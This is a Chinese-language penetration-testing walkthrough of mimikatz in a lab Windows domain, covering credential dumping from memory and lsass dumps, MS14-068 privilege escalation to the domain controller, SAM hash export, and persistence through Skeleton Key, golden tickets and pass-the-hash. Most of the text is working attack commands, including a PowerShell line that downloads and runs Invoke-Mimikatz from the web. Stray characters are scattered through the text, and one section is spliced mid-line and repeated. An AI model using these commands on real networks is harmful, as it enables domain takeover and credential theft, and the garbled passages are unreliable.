0x01 簡介

mimikatz，很多人稱之為密碼抓取神器志珍，但在內(nèi)網(wǎng)滲透中，遠不止這么簡單

0x02 測試環(huán)境

網(wǎng)絡(luò)資源管理模式：

域

已有資源：

域內(nèi)一臺主機權(quán)限

操作系統(tǒng)：win7 x64

域權(quán)限:普通用戶

0x03 測試目標

1、獲得域控權(quán)限 2辨绊、導出所有用戶口令 3客蹋、維持域控權(quán)限

0x04 測試過程

1塞蹭、獲取本機信息

mimikatz：

privilege::debug

sekurlsa::logonpasswords

獲取本機用戶名、口令讶坯、sid番电、LM hash、NTLM hash 如圖

2辆琅、攻擊域控漱办，獲得權(quán)限

使用ms14-068漏洞

ms14-068.exe -u -p -s -d

生成偽造緩存test.ccache:

導入偽造緩存: mimikatz：

kerberos::ptc test.ccache

登陸：

net use \\A-635ECAEE64804.TEST.LOCAL

dir \\A-635ECAEE64804.TEST.LOCAL\c$

3、導出域

（1）直接獲取內(nèi)存口令 mimikatz：

privilege::debug

sekurlsa::logonpasswords

（2）通過內(nèi)存文件獲取口令 使用procdump導出lsass.dmp mimikatz：

sekurlsa::minidump lsass.dmp

sekurlsa::logonPasswords full

（3）通過powershell加載mimikatz獲取口令

powershell IEX (New-ObjectNet.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz

（4）導出所有用戶口令 使用Volue Shadow Copy獲得SYSTEM婉烟、SAM備份（之前文章有介紹） mimikatz：

lsadump::sam SYSTEM.hiv SAM.hiv持域控權(quán)限

（1）Skeleton Key mimikatz：

privilege::debug

misc::skeleton

萬能鑰匙娩井，可使用任意用戶登陸域控

net use \\A-635ECAEE64804.TEST.LOCAL mimikatz /user：test

4、維持域控權(quán)限

（1）Skeleton Key mimikatz：

privilege::debugmisc::skeleton

萬能鑰匙隅很，可使用任意用戶登陸域控

net use \\A-635ECAEE64804.TEST.LOCAL mimikatz /user：test

（2）golden ticket mimikatz：

lsadump::lsa /patch

獲取krbtgt的ntlmhash撞牢，如圖

生成萬能票據(jù)： mimikatz：

kerberos::golden /user:Administrator /domain:test.local/sid:S-1-5-21-2848411111-3820811111-1717111111/krbtgt:d3b949b1f4ef947820f0950111111111 /ticket:test.kirbi

導入票據(jù)： mimikatz：

kerberos::ptt test.kirbi

登陸域控：net use \\A-635ECAEE64804.TEST.LOCAL

dir \\A-635ECAEE64804.TEST.LOCAL\c$

Tips:

Golden Ticket不多說，自行理解

By default, the Golden Ticket default lifetime is 10 years

password changing/smartcard usage does not invalidate Golden Ticket;

this ticket is not emitted by the real KDC, it’s not related to ciphering methods allowed;

NTLM hash of krbtgt account is never changed automatically.

（3）Pass-The-Hash mimikatz：

sekurlsa::pth /user:Administrator /domain:test.local /ntlm:cc36cf7a8514893efccd332446158b1a

5叔营、補充

登陸域控屋彪，刷新掃雷記錄，留下名字;D mimikatz：

minesweeper::infos

如圖